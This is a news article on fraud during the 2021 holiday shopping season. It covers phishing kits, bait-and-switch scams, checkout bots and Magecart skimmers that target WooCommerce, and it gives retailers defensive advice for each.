The holiday shopping season sees vast numbers of people flock online to take advantage of mass sales, most notably during the Black Friday and Cyber Monday period of late November. Cybercriminals are known to significantly expand their efforts to exploit bargain-seeking shoppers during this time in the lead up to Christmas, and 2021 has been no exception.Research from TransUnion discovered that almost 18% of all global e-commerce transactions between Thanksgiving and Cyber Monday were potentially fraudulent, a 4% increase on the same period last year. Here are four examples of how fraudsters targeted the 2021 holiday shopping season with scams and attacks, along with insight into how retailers can prevent and defend against such activity moving forward.Phishing-as-a-service activity targets Black Friday shoppersEmail security firm Egress revealed increased phishing-as-a-service (PhaaS) activity imitating major brands in the lead up to and on Black Friday. It discovered a 397% increase in typosquatting domains tied to phishing kits, with a 334.1% increase in phishing kits impersonating Amazon.Researchers observed almost 4,000 pages imitating the retail giant and detailed an example of a phishing email distributed on Black Friday offering fake Amazon promotions. This attempted to lure recipients into completing an attached form to receive a coupon. Further analysis revealed that the attachment contained XBAgent malware.\u201cPhaaS has lowered the barriers to entry for cybercriminals, making it easy to impersonate well-known brands and trick victims. The recent increase in the number of phishing kits listed for sale highlights the criminals\u2019 appetite for carrying out attacks during busy shopping periods,\u201d stated Egress VP of threat intelligence Jack Chapman in a press release.How retailers should respond to phishing campaigns\u00a0Speaking to CSO, Egress CEO Tony Pepper highlights the important role retailers must play in defending against phishing campaigns of this kind. \u201cI\u2019d like to see more retailers proactively informing their customers of what they should expect from them when it comes to email communication,\u201d he says. \u201cIt can be as simple as providing guidance on their website and social media channels about what email domains they use, and how they\u2019ll usually contact their customers, alongside the more general advice around how to spot and report a phishing email.\u201dRetailers also need to respond to the trend whereby cybercriminals exploit vulnerabilities in websites to hack in and build their own fraudulent pages for collecting credentials. \u201cIn a recent case involving UPS, hackers were able to build a page within the real UPS website, which was then used in phishing attacks,\u201d says Pepper. \u201cBecause the link was technically legitimate, it was almost impossible for the recipient to know that they were being duped. Retailers have a responsibility to ensure that vulnerabilities are identified and patched so that their website can\u2019t become a tool for cybercriminals.\u201dBait-and-switch scheme lures shoppers to fraudulent sitesAnother notable fraud tactic detected this holiday shopping season is a type of \u201cbait-and-switch\u201d scheme designed to trick victims into thinking they\u2019re getting great deals via an online comparison site, only for them to be directed to a phony website that collects their information, says head of financial crime and fraud prevention at D4t4 Solutions Serpil Hall. \u201cOnce victims fill out forms and register their interest, someone from the fake website calls them, gets their card details, and soon after disappears with their money. The victim gets scammed, the card details are used elsewhere for other purchases, and the great deal made over the phone never materializes,\u201d Hall tells CSO.When fraudsters get their hands on card details, they often take them for a test drive with big merchants, making a small purchase to test out the info they\u2019ve obtained, before moving on to make bigger purchases, Hall adds. \u201cSoon after the confirmation, they call the merchant\u2019s customer support and change the delivery address to a very convenient pick-up address. The victim eventually realizes that there is fraud on their card and makes a complaint to their bank, forcing the merchant to bare the losses.\u201dHow retailers should respond to bait-and-switch scamsTo prevent this type of fraud, retailers need to adopt strategies and technologies that catch fraudsters in real-time, Hall says. \u201cUsing advanced machine-learning algorithms, merchants should move to identifying fraudulent transactions using unique identifiers like IP geolocation, email addresses, and postal addresses. However, fraud prevention is not limited to these methods, and real-time mechanisms that auto decline high-risk orders, as well as send risk signals for new account fraud and account takeover cases are also required.\u201dBehavioral biometrics grant merchants this capability by constantly measuring the way in which consumers swipe on their devices, how they hold their devices, specific keystroke patterns, device movements, and more. Using this data, merchants can understand when digital patterns diverge from past behavior \u2013 potentially indicating a compromised account \u2013 and take immediate action to stop fraudulent activity dead in its tracks.Checkout abuse and inventory hoarding skews market trendsGiven the nature of the discount-heavy holiday shopping period, the market is increasingly saturated with many retailers \u2013 and fraudsters \u2013 wanting a slice of the cake, says Ping Identity\u2019s head of fraud Alasdair Rambaud. As a result, checkout abuse (the e-commerce equivalent of ticket scalping) is highly likely to have taken place, he tells CSO. \u201cFraudsters use an automated script to buy a volume of high-end, limited-edition products in minutes or seconds, depleting legitimate merchants\u2019 inventories. They then resell those items for much higher prices.\u201dSimilarly, inventory hoarding \u2013 the process of using bots to put products in shopping carts, skewing inventory data and making products appear to be out of stock \u2013 has also been doing the rounds, Rambaud adds. \u201cBots can wipe out inventory of an item in as little as two seconds.\u201d The fact is that e-commerce is here to stay, and now it\u2019s time for retailers and brands to have a steadfast strategy when it comes to this type of fraud \u2013 failure to do so will lead to reputational damage, he says.How retailers should respond to checkout abuse and inventory fraud\u201cRetailers need to understand the scope of account takeovers, new account fraud, and other fraud attacks.\u201d This involves analyzing movements and behaviors \u2013 looking for non-human trends with regards to keystrokes, scrolling, mouse movement, and touchscreen interaction.Magecart card skimming attacks target WooCommerceCard skimming is a common fraud tactic that targets online purchases. It works by injecting malicious code into e-commerce sites that skims online payment forms. This style of attack first came to prominence against e-commerce platform Magento, with numerous criminal groups subsequently turning to card skimming tactics to steal payment card details.One such group is Magecart, and research from RiskIQ has identified new attacks taking advantage of potential vulnerabilities and weaknesses in WooCommerce (an open-source WordPress plugin widely used by online retailers) during the latest holiday shopping period. In a blog post, the cyberthreat intelligence company detailed three new Magecart skimmers it has identified targeting retailers using the WooCommerce plugin. These are:The WooTheme Skimmer: Detected across five domains using a compromised WooCommerce theme, this skimmer is \u201crelatively simplistic and makes its functionality reasonably easy to understand,\u201d RiskIQ said. Operators obfuscated the skimming code in all discovered iterations, except one. However, this one instance appears to be in error, as RiskIQ detected the obfuscated skimmer on the same compromised domain before the clear text version appearedThe Slect Skimmer: In this case, a spelling error of the word \u2018select\u2019 in the script revealed a never-before-seen skimmer which does two interesting things once the DOM content is fully loaded, RiskIQ explained. \u201cIt will look for a series of form fields that the skimmer does not want to pull data from, such as open text fields, passwords and checkboxes. Next, an event listener listens for a click on a button, likely to evade sandboxing by security researchers.\u201d The exfil domain found within the skimmer has been previously associated with other Magecart infrastructure.The Gateway Skimmer: This skimmer was piled high with multiple layers and steps taken by the actor to hide and obfuscate processes, Risk IQ said. \u201cThe skimmer code is massive and difficult to digest while obfuscated and runs a few unique functions observed in other skimmers\u201dHow retailers should respond to card skimmingWhile in the thick of the holiday season, an increase in e-commerce targeting puts retailers and online shoppers particularly at risk of card skimming, RiskIQ\u2019s blog read. \u201cWooCommerce users are often small and medium-sized businesses, sometimes considered the most vulnerable, as they lack resources for complex and highly-vetted third-party tools.\u201d However, as evidenced over the years, both small and large retailers can be the targets of Magecart skimming. \u201cBeyond having robust detections for malware, website operations should regularly inspect their crontab commands for strange contents, ensure that access permissions are correct, and audit file access to it,\u201d RiskIQ added.